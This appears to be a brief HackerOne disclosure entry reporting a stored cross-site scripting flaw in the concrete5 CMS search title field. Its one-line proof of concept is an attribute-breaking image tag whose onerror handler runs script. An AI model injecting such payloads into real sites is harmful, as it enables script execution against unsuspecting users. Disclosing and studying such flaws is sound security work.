concrete5: Stored XSS on Search Title

2015-03-08T08:56:11
ID H1:50556
Type hackerone
Reporter ishahriyar
Modified 2015-07-08T18:33:07

Description

XSS payload can be executed and saved permanently in search title.

Poc code: "><img src=x onerror=alert(1)>